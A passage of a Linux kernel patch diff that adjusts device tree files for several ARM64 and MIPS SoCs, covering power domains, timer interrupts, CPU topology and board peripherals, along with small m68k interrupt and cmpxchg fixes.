+index 7a41250539ff5..3d4941dc31d74 100644
+--- a/arch/arm64/boot/dts/qcom/msm8998.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8998.dtsi
+@@ -1457,7 +1457,6 @@ adreno_smmu: iommu@5040000 {
+ 			 * SoC VDDMX RPM Power Domain in the Adreno driver.
+ 			 */
+ 			power-domains = <&gpucc GPU_GX_GDSC>;
+-			status = "disabled";
+ 		};
+ 
+ 		gpucc: clock-controller@5065000 {
+diff --git a/arch/arm64/boot/dts/qcom/sdm845.dtsi b/arch/arm64/boot/dts/qcom/sdm845.dtsi
+index 95c515da9f2e0..71644b9b8866a 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845.dtsi
++++ b/arch/arm64/boot/dts/qcom/sdm845.dtsi
+@@ -2537,6 +2537,8 @@ ufs_mem_phy: phy@1d87000 {
+ 			clocks = <&gcc GCC_UFS_MEM_CLKREF_CLK>,
+ 				 <&gcc GCC_UFS_PHY_PHY_AUX_CLK>;
+ 
++			power-domains = <&gcc UFS_PHY_GDSC>;
++
+ 			resets = <&ufs_mem_hc 0>;
+ 			reset-names = "ufsphy";
+ 			status = "disabled";
+diff --git a/arch/arm64/boot/dts/qcom/sm6350.dtsi b/arch/arm64/boot/dts/qcom/sm6350.dtsi
+index 9da373090593c..ba078099b8054 100644
+--- a/arch/arm64/boot/dts/qcom/sm6350.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm6350.dtsi
+@@ -830,6 +830,8 @@ ufs_mem_phy: phy@1d87000 {
+ 			clocks = <&gcc GCC_UFS_MEM_CLKREF_CLK>,
+ 				 <&gcc GCC_UFS_PHY_PHY_AUX_CLK>;
+ 
++			power-domains = <&gcc UFS_PHY_GDSC>;
++
+ 			resets = <&ufs_mem_hc 0>;
+ 			reset-names = "ufsphy";
+ 
+@@ -893,6 +895,7 @@ fastrpc {
+ 					compatible = "qcom,fastrpc";
+ 					qcom,glink-channels = "fastrpcglink-apps-dsp";
+ 					label = "adsp";
++					qcom,non-secure-domain;
+ 					#address-cells = <1>;
+ 					#size-cells = <0>;
+ 
+@@ -1000,6 +1003,7 @@ fastrpc {
+ 					compatible = "qcom,fastrpc";
+ 					qcom,glink-channels = "fastrpcglink-apps-dsp";
+ 					label = "cdsp";
++					qcom,non-secure-domain;
+ 					#address-cells = <1>;
+ 					#size-cells = <0>;
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sm8250.dtsi b/arch/arm64/boot/dts/qcom/sm8250.dtsi
+index 3d02adbc0b62f..6a2852584405e 100644
+--- a/arch/arm64/boot/dts/qcom/sm8250.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8250.dtsi
+@@ -2125,7 +2125,7 @@ ufs_mem_hc: ufshc@1d84000 {
+ 				     "jedec,ufs-2.0";
+ 			reg = <0 0x01d84000 0 0x3000>;
+ 			interrupts = <GIC_SPI 265 IRQ_TYPE_LEVEL_HIGH>;
+-			phys = <&ufs_mem_phy_lanes>;
++			phys = <&ufs_mem_phy>;
+ 			phy-names = "ufsphy";
+ 			lanes-per-direction = <2>;
+ 			#reset-cells = <1>;
+@@ -2169,10 +2169,8 @@ ufs_mem_hc: ufshc@1d84000 {
+ 
+ 		ufs_mem_phy: phy@1d87000 {
+ 			compatible = "qcom,sm8250-qmp-ufs-phy";
+-			reg = <0 0x01d87000 0 0x1c0>;
+-			#address-cells = <2>;
+-			#size-cells = <2>;
+-			ranges;
++			reg = <0 0x01d87000 0 0x1000>;
++
+ 			clock-names = "ref",
+ 				      "ref_aux";
+ 			clocks = <&rpmhcc RPMH_CXO_CLK>,
+@@ -2180,16 +2178,12 @@ ufs_mem_phy: phy@1d87000 {
+ 
+ 			resets = <&ufs_mem_hc 0>;
+ 			reset-names = "ufsphy";
+-			status = "disabled";
+ 
+-			ufs_mem_phy_lanes: phy@1d87400 {
+-				reg = <0 0x01d87400 0 0x16c>,
+-				      <0 0x01d87600 0 0x200>,
+-				      <0 0x01d87c00 0 0x200>,
+-				      <0 0x01d87800 0 0x16c>,
+-				      <0 0x01d87a00 0 0x200>;
+-				#phy-cells = <0>;
+-			};
++			power-domains = <&gcc UFS_PHY_GDSC>;
++
++			#phy-cells = <0>;
++
++			status = "disabled";
+ 		};
+ 
+ 		ipa_virt: interconnect@1e00000 {
+diff --git a/arch/arm64/boot/dts/qcom/sm8450.dtsi b/arch/arm64/boot/dts/qcom/sm8450.dtsi
+index 128542582b3d8..aa0977af9411a 100644
+--- a/arch/arm64/boot/dts/qcom/sm8450.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8450.dtsi
+@@ -3153,6 +3153,8 @@ ufs_mem_phy: phy@1d87000 {
+ 				 <&gcc GCC_UFS_PHY_PHY_AUX_CLK>,
+ 				 <&gcc GCC_UFS_0_CLKREF_EN>;
+ 
++			power-domains = <&gcc UFS_PHY_GDSC>;
++
+ 			resets = <&ufs_mem_hc 0>;
+ 			reset-names = "ufsphy";
+ 			status = "disabled";
+diff --git a/arch/arm64/boot/dts/renesas/r8a779a0.dtsi b/arch/arm64/boot/dts/renesas/r8a779a0.dtsi
+index b677ef6705d94..158c99b1a7b79 100644
+--- a/arch/arm64/boot/dts/renesas/r8a779a0.dtsi
++++ b/arch/arm64/boot/dts/renesas/r8a779a0.dtsi
+@@ -2209,8 +2209,7 @@ gic: interrupt-controller@f1000000 {
+ 			interrupt-controller;
+ 			reg = <0x0 0xf1000000 0 0x20000>,
+ 			      <0x0 0xf1060000 0 0x110000>;
+-			interrupts = <GIC_PPI 9
+-				      (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_HIGH)>;
++			interrupts = <GIC_PPI 9 IRQ_TYPE_LEVEL_HIGH>;
+ 		};
+ 
+ 		fcpvd0: fcp@fea10000 {
+@@ -2857,9 +2856,12 @@ sensor5_crit: sensor5-crit {
+ 
+ 	timer {
+ 		compatible = "arm,armv8-timer";
+-		interrupts-extended = <&gic GIC_PPI 13 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>,
+-				      <&gic GIC_PPI 14 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>,
+-				      <&gic GIC_PPI 11 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>,
+-				      <&gic GIC_PPI 10 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>;
++		interrupts-extended = <&gic GIC_PPI 13 IRQ_TYPE_LEVEL_LOW>,
++				      <&gic GIC_PPI 14 IRQ_TYPE_LEVEL_LOW>,
++				      <&gic GIC_PPI 11 IRQ_TYPE_LEVEL_LOW>,
++				      <&gic GIC_PPI 10 IRQ_TYPE_LEVEL_LOW>,
++				      <&gic GIC_PPI 12 IRQ_TYPE_LEVEL_LOW>;
++		interrupt-names = "sec-phys", "phys", "virt", "hyp-phys",
++				  "hyp-virt";
+ 	};
+ };
+diff --git a/arch/arm64/boot/dts/renesas/r8a779f0.dtsi b/arch/arm64/boot/dts/renesas/r8a779f0.dtsi
+index 4092c0016035e..140c4672ff5b0 100644
+--- a/arch/arm64/boot/dts/renesas/r8a779f0.dtsi
++++ b/arch/arm64/boot/dts/renesas/r8a779f0.dtsi
+@@ -935,8 +935,7 @@ gic: interrupt-controller@f1000000 {
+ 			interrupt-controller;
+ 			reg = <0x0 0xf1000000 0 0x20000>,
+ 			      <0x0 0xf1060000 0 0x110000>;
+-			interrupts = <GIC_PPI 9
+-				      (GIC_CPU_MASK_SIMPLE(8) | IRQ_TYPE_LEVEL_HIGH)>;
++			interrupts = <GIC_PPI 9 IRQ_TYPE_LEVEL_HIGH>;
+ 		};
+ 
+ 		prr: chipid@fff00044 {
+@@ -991,10 +990,13 @@ sensor3_crit: sensor3-crit {
+ 
+ 	timer {
+ 		compatible = "arm,armv8-timer";
+-		interrupts-extended = <&gic GIC_PPI 13 (GIC_CPU_MASK_SIMPLE(8) | IRQ_TYPE_LEVEL_LOW)>,
+-				      <&gic GIC_PPI 14 (GIC_CPU_MASK_SIMPLE(8) | IRQ_TYPE_LEVEL_LOW)>,
+-				      <&gic GIC_PPI 11 (GIC_CPU_MASK_SIMPLE(8) | IRQ_TYPE_LEVEL_LOW)>,
+-				      <&gic GIC_PPI 10 (GIC_CPU_MASK_SIMPLE(8) | IRQ_TYPE_LEVEL_LOW)>;
++		interrupts-extended = <&gic GIC_PPI 13 IRQ_TYPE_LEVEL_LOW>,
++				      <&gic GIC_PPI 14 IRQ_TYPE_LEVEL_LOW>,
++				      <&gic GIC_PPI 11 IRQ_TYPE_LEVEL_LOW>,
++				      <&gic GIC_PPI 10 IRQ_TYPE_LEVEL_LOW>,
++				      <&gic GIC_PPI 12 IRQ_TYPE_LEVEL_LOW>;
++		interrupt-names = "sec-phys", "phys", "virt", "hyp-phys",
++				  "hyp-virt";
+ 	};
+ 
+ 	ufs30_clk: ufs30-clk {
+diff --git a/arch/arm64/boot/dts/renesas/r8a779g0.dtsi b/arch/arm64/boot/dts/renesas/r8a779g0.dtsi
+index 868d1a3cbdf61..3de3ea0073c3e 100644
+--- a/arch/arm64/boot/dts/renesas/r8a779g0.dtsi
++++ b/arch/arm64/boot/dts/renesas/r8a779g0.dtsi
+@@ -18,12 +18,80 @@ cpus {
+ 		#address-cells = <1>;
+ 		#size-cells = <0>;
+ 
++		cpu-map {
++			cluster0 {
++				core0 {
++					cpu = <&a76_0>;
++				};
++				core1 {
++					cpu = <&a76_1>;
++				};
++			};
++
++			cluster1 {
++				core0 {
++					cpu = <&a76_2>;
++				};
++				core1 {
++					cpu = <&a76_3>;
++				};
++			};
++		};
++
+ 		a76_0: cpu@0 {
+ 			compatible = "arm,cortex-a76";
+ 			reg = <0>;
+ 			device_type = "cpu";
+ 			power-domains = <&sysc R8A779G0_PD_A1E0D0C0>;
++			next-level-cache = <&L3_CA76_0>;
++			enable-method = "psci";
++		};
++
++		a76_1: cpu@100 {
++			compatible = "arm,cortex-a76";
++			reg = <0x100>;
++			device_type = "cpu";
++			power-domains = <&sysc R8A779G0_PD_A1E0D0C1>;
++			next-level-cache = <&L3_CA76_0>;
++			enable-method = "psci";
++		};
++
++		a76_2: cpu@10000 {
++			compatible = "arm,cortex-a76";
++			reg = <0x10000>;
++			device_type = "cpu";
++			power-domains = <&sysc R8A779G0_PD_A1E0D1C0>;
++			next-level-cache = <&L3_CA76_1>;
++			enable-method = "psci";
+ 		};
++
++		a76_3: cpu@10100 {
++			compatible = "arm,cortex-a76";
++			reg = <0x10100>;
++			device_type = "cpu";
++			power-domains = <&sysc R8A779G0_PD_A1E0D1C1>;
++			next-level-cache = <&L3_CA76_1>;
++			enable-method = "psci";
++		};
++
++		L3_CA76_0: cache-controller-0 {
++			compatible = "cache";
++			power-domains = <&sysc R8A779G0_PD_A2E0D0>;
++			cache-unified;
++			cache-level = <3>;
++		};
++
++		L3_CA76_1: cache-controller-1 {
++			compatible = "cache";
++			power-domains = <&sysc R8A779G0_PD_A2E0D1>;
++			cache-unified;
++			cache-level = <3>;
++		};
++	};
++
++	psci {
++		compatible = "arm,psci-1.0", "arm,psci-0.2";
++		method = "smc";
+ 	};
+ 
+ 	extal_clk: extal {
+@@ -482,8 +550,7 @@ gic: interrupt-controller@f1000000 {
+ 			interrupt-controller;
+ 			reg = <0x0 0xf1000000 0 0x20000>,
+ 			      <0x0 0xf1060000 0 0x110000>;
+-			interrupts = <GIC_PPI 9
+-				      (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_HIGH)>;
++			interrupts = <GIC_PPI 9 IRQ_TYPE_LEVEL_HIGH>;
+ 		};
+ 
+ 		prr: chipid@fff00044 {
+@@ -494,9 +561,12 @@ prr: chipid@fff00044 {
+ 
+ 	timer {
+ 		compatible = "arm,armv8-timer";
+-		interrupts-extended = <&gic GIC_PPI 13 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>,
+-				      <&gic GIC_PPI 14 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>,
+-				      <&gic GIC_PPI 11 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>,
+-				      <&gic GIC_PPI 10 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>;
++		interrupts-extended = <&gic GIC_PPI 13 IRQ_TYPE_LEVEL_LOW>,
++				      <&gic GIC_PPI 14 IRQ_TYPE_LEVEL_LOW>,
++				      <&gic GIC_PPI 11 IRQ_TYPE_LEVEL_LOW>,
++				      <&gic GIC_PPI 10 IRQ_TYPE_LEVEL_LOW>,
++				      <&gic GIC_PPI 12 IRQ_TYPE_LEVEL_LOW>;
++		interrupt-names = "sec-phys", "phys", "virt", "hyp-phys",
++				  "hyp-virt";
+ 	};
+ };
+diff --git a/arch/arm64/boot/dts/renesas/r9a07g043u.dtsi b/arch/arm64/boot/dts/renesas/r9a07g043u.dtsi
+index 011d4c88f4ed9..2e7db48462e1f 100644
+--- a/arch/arm64/boot/dts/renesas/r9a07g043u.dtsi
++++ b/arch/arm64/boot/dts/renesas/r9a07g043u.dtsi
+@@ -41,10 +41,13 @@ psci {
+ 
+ 	timer {
+ 		compatible = "arm,armv8-timer";
+-		interrupts-extended = <&gic GIC_PPI 13 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>,
+-				      <&gic GIC_PPI 14 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>,
+-				      <&gic GIC_PPI 11 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>,
+-				      <&gic GIC_PPI 10 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>;
++		interrupts-extended = <&gic GIC_PPI 13 IRQ_TYPE_LEVEL_LOW>,
++				      <&gic GIC_PPI 14 IRQ_TYPE_LEVEL_LOW>,
++				      <&gic GIC_PPI 11 IRQ_TYPE_LEVEL_LOW>,
++				      <&gic GIC_PPI 10 IRQ_TYPE_LEVEL_LOW>,
++				      <&gic GIC_PPI 12 IRQ_TYPE_LEVEL_LOW>;
++		interrupt-names = "sec-phys", "phys", "virt", "hyp-phys",
++				  "hyp-virt";
+ 	};
+ };
+ 
+diff --git a/arch/arm64/boot/dts/renesas/r9a07g044.dtsi b/arch/arm64/boot/dts/renesas/r9a07g044.dtsi
+index d26488b5a82df..4703fbc9a8e0a 100644
+--- a/arch/arm64/boot/dts/renesas/r9a07g044.dtsi
++++ b/arch/arm64/boot/dts/renesas/r9a07g044.dtsi
+@@ -1091,9 +1091,12 @@ target: trip-point {
+ 
+ 	timer {
+ 		compatible = "arm,armv8-timer";
+-		interrupts-extended = <&gic GIC_PPI 13 (GIC_CPU_MASK_SIMPLE(2) | IRQ_TYPE_LEVEL_LOW)>,
+-				      <&gic GIC_PPI 14 (GIC_CPU_MASK_SIMPLE(2) | IRQ_TYPE_LEVEL_LOW)>,
+-				      <&gic GIC_PPI 11 (GIC_CPU_MASK_SIMPLE(2) | IRQ_TYPE_LEVEL_LOW)>,
+-				      <&gic GIC_PPI 10 (GIC_CPU_MASK_SIMPLE(2) | IRQ_TYPE_LEVEL_LOW)>;
++		interrupts-extended = <&gic GIC_PPI 13 IRQ_TYPE_LEVEL_LOW>,
++				      <&gic GIC_PPI 14 IRQ_TYPE_LEVEL_LOW>,
++				      <&gic GIC_PPI 11 IRQ_TYPE_LEVEL_LOW>,
++				      <&gic GIC_PPI 10 IRQ_TYPE_LEVEL_LOW>,
++				      <&gic GIC_PPI 12 IRQ_TYPE_LEVEL_LOW>;
++		interrupt-names = "sec-phys", "phys", "virt", "hyp-phys",
++				  "hyp-virt";
+ 	};
+ };
+diff --git a/arch/arm64/boot/dts/renesas/r9a07g044c1.dtsi b/arch/arm64/boot/dts/renesas/r9a07g044c1.dtsi
+index 1d57df706939c..56a979e82c4f1 100644
+--- a/arch/arm64/boot/dts/renesas/r9a07g044c1.dtsi
++++ b/arch/arm64/boot/dts/renesas/r9a07g044c1.dtsi
+@@ -15,13 +15,6 @@ cpus {
+ 		/delete-node/ cpu-map;
+ 		/delete-node/ cpu@100;
+ 	};
+-
+-	timer {
+-		interrupts-extended = <&gic GIC_PPI 13 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>,
+-				      <&gic GIC_PPI 14 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>,
+-				      <&gic GIC_PPI 11 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>,
+-				      <&gic GIC_PPI 10 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>;
+-	};
+ };
+ 
+ &soc {
+diff --git a/arch/arm64/boot/dts/renesas/r9a07g044l1.dtsi b/arch/arm64/boot/dts/renesas/r9a07g044l1.dtsi
+index 9d89d4590358e..9cf27ca9f1d2a 100644
+--- a/arch/arm64/boot/dts/renesas/r9a07g044l1.dtsi
++++ b/arch/arm64/boot/dts/renesas/r9a07g044l1.dtsi
+@@ -15,11 +15,4 @@ cpus {
+ 		/delete-node/ cpu-map;
+ 		/delete-node/ cpu@100;
+ 	};
+-
+-	timer {
+-		interrupts-extended = <&gic GIC_PPI 13 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>,
+-				      <&gic GIC_PPI 14 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>,
+-				      <&gic GIC_PPI 11 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>,
+-				      <&gic GIC_PPI 10 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>;
+-	};
+ };
+diff --git a/arch/arm64/boot/dts/renesas/r9a07g054.dtsi b/arch/arm64/boot/dts/renesas/r9a07g054.dtsi
+index b3d37ca942ee3..60a20a3ca12e3 100644
+--- a/arch/arm64/boot/dts/renesas/r9a07g054.dtsi
++++ b/arch/arm64/boot/dts/renesas/r9a07g054.dtsi
+@@ -1097,9 +1097,12 @@ target: trip-point {
+ 
+ 	timer {
+ 		compatible = "arm,armv8-timer";
+-		interrupts-extended = <&gic GIC_PPI 13 (GIC_CPU_MASK_SIMPLE(2) | IRQ_TYPE_LEVEL_LOW)>,
+-				      <&gic GIC_PPI 14 (GIC_CPU_MASK_SIMPLE(2) | IRQ_TYPE_LEVEL_LOW)>,
+-				      <&gic GIC_PPI 11 (GIC_CPU_MASK_SIMPLE(2) | IRQ_TYPE_LEVEL_LOW)>,
+-				      <&gic GIC_PPI 10 (GIC_CPU_MASK_SIMPLE(2) | IRQ_TYPE_LEVEL_LOW)>;
++		interrupts-extended = <&gic GIC_PPI 13 IRQ_TYPE_LEVEL_LOW>,
++				      <&gic GIC_PPI 14 IRQ_TYPE_LEVEL_LOW>,
++				      <&gic GIC_PPI 11 IRQ_TYPE_LEVEL_LOW>,
++				      <&gic GIC_PPI 10 IRQ_TYPE_LEVEL_LOW>,
++				      <&gic GIC_PPI 12 IRQ_TYPE_LEVEL_LOW>;
++		interrupt-names = "sec-phys", "phys", "virt", "hyp-phys",
++				  "hyp-virt";
+ 	};
+ };
+diff --git a/arch/arm64/boot/dts/renesas/r9a07g054l1.dtsi b/arch/arm64/boot/dts/renesas/r9a07g054l1.dtsi
+index c448cc6634c1a..d85a6ac0f0245 100644
+--- a/arch/arm64/boot/dts/renesas/r9a07g054l1.dtsi
++++ b/arch/arm64/boot/dts/renesas/r9a07g054l1.dtsi
+@@ -15,11 +15,4 @@ cpus {
+ 		/delete-node/ cpu-map;
+ 		/delete-node/ cpu@100;
+ 	};
+-
+-	timer {
+-		interrupts-extended = <&gic GIC_PPI 13 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>,
+-				      <&gic GIC_PPI 14 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>,
+-				      <&gic GIC_PPI 11 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>,
+-				      <&gic GIC_PPI 10 (GIC_CPU_MASK_SIMPLE(1) | IRQ_TYPE_LEVEL_LOW)>;
+-	};
+ };
+diff --git a/arch/arm64/boot/dts/rockchip/rk3308-rock-pi-s.dts b/arch/arm64/boot/dts/rockchip/rk3308-rock-pi-s.dts
+index edc8d2e3980d0..bc9e98fe0f013 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3308-rock-pi-s.dts
++++ b/arch/arm64/boot/dts/rockchip/rk3308-rock-pi-s.dts
+@@ -17,6 +17,7 @@ aliases {
+ 		ethernet0 = &gmac;
+ 		mmc0 = &emmc;
+ 		mmc1 = &sdmmc;
++		mmc2 = &sdio;
+ 	};
+ 
+ 	chosen {
+@@ -145,11 +146,25 @@ &emmc {
+ 
+ &gmac {
+ 	clock_in_out = "output";
++	phy-handle = <&rtl8201f>;
+ 	phy-supply = <&vcc_io>;
+-	snps,reset-gpio = <&gpio0 RK_PA7 GPIO_ACTIVE_LOW>;
+-	snps,reset-active-low;
+-	snps,reset-delays-us = <0 50000 50000>;
+ 	status = "okay";
++
++	mdio {
++		compatible = "snps,dwmac-mdio";
++		#address-cells = <1>;
++		#size-cells = <0>;
++
++		rtl8201f: ethernet-phy@1 {
++			compatible = "ethernet-phy-ieee802.3-c22";
++			reg = <1>;
++			pinctrl-names = "default";
++			pinctrl-0 = <&mac_rst>;
++			reset-assert-us = <20000>;
++			reset-deassert-us = <50000>;
++			reset-gpios = <&gpio0 RK_PA7 GPIO_ACTIVE_LOW>;
++		};
++	};
+ };
+ 
+ &i2c1 {
+@@ -160,6 +175,26 @@ &pinctrl {
+ 	pinctrl-names = "default";
+ 	pinctrl-0 = <&rtc_32k>;
+ 
++	bluetooth {
++		bt_reg_on: bt-reg-on {
++			rockchip,pins = <4 RK_PB3 RK_FUNC_GPIO &pcfg_pull_none>;
++		};
++
++		bt_wake_host: bt-wake-host {
++			rockchip,pins = <4 RK_PB4 RK_FUNC_GPIO &pcfg_pull_down>;
++		};
++
++		host_wake_bt: host-wake-bt {
++			rockchip,pins = <4 RK_PB2 RK_FUNC_GPIO &pcfg_pull_none>;
++		};
++	};
++
++	gmac {
++		mac_rst: mac-rst {
++			rockchip,pins = <0 RK_PA7 RK_FUNC_GPIO &pcfg_pull_none>;
++		};
++	};
++
+ 	leds {
+ 		green_led: green-led {
+ 			rockchip,pins = <0 RK_PA6 RK_FUNC_GPIO &pcfg_pull_none>;
+@@ -203,15 +238,31 @@ &sdio {
+ 	cap-sd-highspeed;
+ 	cap-sdio-irq;
+ 	keep-power-in-suspend;
+-	max-frequency = <1000000>;
++	max-frequency = <100000000>;
+ 	mmc-pwrseq = <&sdio_pwrseq>;
++	no-mmc;
++	no-sd;
+ 	non-removable;
+-	sd-uhs-sdr104;
++	sd-uhs-sdr50;
++	vmmc-supply = <&vcc_io>;
++	vqmmc-supply = <&vcc_1v8>;
+ 	status = "okay";
++
++	rtl8723ds: wifi@1 {
++		reg = <1>;
++		interrupt-parent = <&gpio0>;
++		interrupts = <RK_PA0 IRQ_TYPE_LEVEL_HIGH>;
++		interrupt-names = "host-wake";
++		pinctrl-names = "default";
++		pinctrl-0 = <&wifi_host_wake>;
++	};
+ };
+ 
+ &sdmmc {
++	cap-mmc-highspeed;
+ 	cap-sd-highspeed;
++	disable-wp;
++	vmmc-supply = <&vcc_io>;
+ 	status = "okay";
+ };
+ 
+@@ -230,16 +281,22 @@ u2phy_otg: otg-port {
+ };
+ 
+ &uart0 {
++	pinctrl-names = "default";
++	pinctrl-0 = <&uart0_xfer>;
+ 	status = "okay";
+ };
+ 
+ &uart4 {
++	uart-has-rtscts;
+ 	status = "okay";
+ 
+ 	bluetooth {
+-		compatible = "realtek,rtl8723bs-bt";
+-		device-wake-gpios = <&gpio4 RK_PB3 GPIO_ACTIVE_HIGH>;
++		compatible = "realtek,rtl8723ds-bt";
++		device-wake-gpios = <&gpio4 RK_PB2 GPIO_ACTIVE_HIGH>;
++		enable-gpios = <&gpio4 RK_PB3 GPIO_ACTIVE_HIGH>;
+ 		host-wake-gpios = <&gpio4 RK_PB4 GPIO_ACTIVE_HIGH>;
++		pinctrl-names = "default";
++		pinctrl-0 = <&bt_reg_on &bt_wake_host &host_wake_bt>;
+ 	};
+ };
+ 
+diff --git a/arch/arm64/boot/dts/rockchip/rk3328.dtsi b/arch/arm64/boot/dts/rockchip/rk3328.dtsi
+index d42846efff2fe..5adb2fbc2aafa 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3328.dtsi
++++ b/arch/arm64/boot/dts/rockchip/rk3328.dtsi
+@@ -820,8 +820,8 @@ cru: clock-controller@ff440000 {
+ 			<0>, <24000000>,
+ 			<24000000>, <24000000>,
+ 			<15000000>, <15000000>,
+-			<100000000>, <100000000>,
+-			<100000000>, <100000000>,
++			<300000000>, <100000000>,
++			<400000000>, <100000000>,
+ 			<50000000>, <100000000>,
+ 			<100000000>, <100000000>,
+ 			<50000000>, <50000000>,
+diff --git a/arch/arm64/boot/dts/rockchip/rk3568-evb1-v10.dts b/arch/arm64/boot/dts/rockchip/rk3568-evb1-v10.dts
+index 674792567fa6e..4fc8354e069a7 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3568-evb1-v10.dts
++++ b/arch/arm64/boot/dts/rockchip/rk3568-evb1-v10.dts
+@@ -478,7 +478,7 @@ regulator-state-mem {
+ 		};
+ 
+ 		codec {
+-			mic-in-differential;
++			rockchip,mic-in-differential;
+ 		};
+ 	};
+ };
+diff --git a/arch/arm64/boot/dts/rockchip/rk3568-rock-3a.dts b/arch/arm64/boot/dts/rockchip/rk3568-rock-3a.dts
+index bab46db2b18cd..478620c782599 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3568-rock-3a.dts
++++ b/arch/arm64/boot/dts/rockchip/rk3568-rock-3a.dts
+@@ -481,10 +481,6 @@ regulator-state-mem {
+ 				};
+ 			};
+ 		};
+-
+-		codec {
+-			mic-in-differential;
+-		};
+ 	};
+ };
+ 
+diff --git a/arch/arm64/boot/dts/rockchip/rk356x.dtsi b/arch/arm64/boot/dts/rockchip/rk356x.dtsi
+index 99ad6fc51b584..e5c88f0007253 100644
+--- a/arch/arm64/boot/dts/rockchip/rk356x.dtsi
++++ b/arch/arm64/boot/dts/rockchip/rk356x.dtsi
+@@ -737,6 +737,7 @@ vop_mmu: iommu@fe043e00 {
+ 		clocks = <&cru ACLK_VOP>, <&cru HCLK_VOP>;
+ 		clock-names = "aclk", "iface";
+ 		#iommu-cells = <0>;
++		power-domains = <&power RK3568_PD_VO>;
+ 		status = "disabled";
+ 	};
+ 
+diff --git a/arch/m68k/amiga/config.c b/arch/m68k/amiga/config.c
+index 3137b45750dfc..b7cb28f5ee290 100644
+--- a/arch/m68k/amiga/config.c
++++ b/arch/m68k/amiga/config.c
+@@ -180,6 +180,15 @@ int __init amiga_parse_bootinfo(const struct bi_record *record)
+ 			dev->slotsize = be16_to_cpu(cd->cd_SlotSize);
+ 			dev->boardaddr = be32_to_cpu(cd->cd_BoardAddr);
+ 			dev->boardsize = be32_to_cpu(cd->cd_BoardSize);
++
++			/* CS-LAB Warp 1260 workaround */
++			if (be16_to_cpu(dev->rom.er_Manufacturer) == ZORRO_MANUF(ZORRO_PROD_CSLAB_WARP_1260) &&
++			    dev->rom.er_Product == ZORRO_PROD(ZORRO_PROD_CSLAB_WARP_1260)) {
++
++				/* turn off all interrupts */
++				pr_info("Warp 1260 card detected: applying interrupt storm workaround\n");
++				*(uint32_t *)(dev->boardaddr + 0x1000) = 0xfff;
++			}
+ 		} else
+ 			pr_warn("amiga_parse_bootinfo: too many AutoConfig devices\n");
+ #endif /* CONFIG_ZORRO */
+diff --git a/arch/m68k/atari/ataints.c b/arch/m68k/atari/ataints.c
+index 56f02ea2c248d..715d1e0d973e6 100644
+--- a/arch/m68k/atari/ataints.c
++++ b/arch/m68k/atari/ataints.c
+@@ -302,11 +302,7 @@ void __init atari_init_IRQ(void)
+ 
+ 	if (ATARIHW_PRESENT(SCU)) {
+ 		/* init the SCU if present */
+-		tt_scu.sys_mask = 0x10;		/* enable VBL (for the cursor) and
+-									 * disable HSYNC interrupts (who
+-									 * needs them?)  MFP and SCC are
+-									 * enabled in VME mask
+-									 */
++		tt_scu.sys_mask = 0x0;		/* disable all interrupts */
+ 		tt_scu.vme_mask = 0x60;		/* enable MFP and SCC ints */
+ 	} else {
+ 		/* If no SCU and no Hades, the HSYNC interrupt needs to be
+diff --git a/arch/m68k/include/asm/cmpxchg.h b/arch/m68k/include/asm/cmpxchg.h
+index 6cf464cdab067..694a44a5c3b05 100644
+--- a/arch/m68k/include/asm/cmpxchg.h
++++ b/arch/m68k/include/asm/cmpxchg.h
+@@ -32,7 +32,7 @@ static inline unsigned long __xchg(unsigned long x, volatile void * ptr, int siz
+ 		x = tmp;
+ 		break;
+ 	default:
+-		tmp = __invalid_xchg_size(x, ptr, size);
++		x = __invalid_xchg_size(x, ptr, size);
+ 		break;
+ 	}
+ 
+diff --git a/arch/mips/boot/dts/loongson/loongson64-2k1000.dtsi b/arch/mips/boot/dts/loongson/loongson64-2k1000.dtsi
+index c16b521308cb1..9089d1e4f3fee 100644
+--- a/arch/mips/boot/dts/loongson/loongson64-2k1000.dtsi
++++ b/arch/mips/boot/dts/loongson/loongson64-2k1000.dtsi
+@@ -23,14 +23,6 @@ cpu0: cpu@0 {
+ 		};
+ 	};
+ 
+-	memory@200000 {
+-		compatible = "memory";
+-		device_type = "memory";
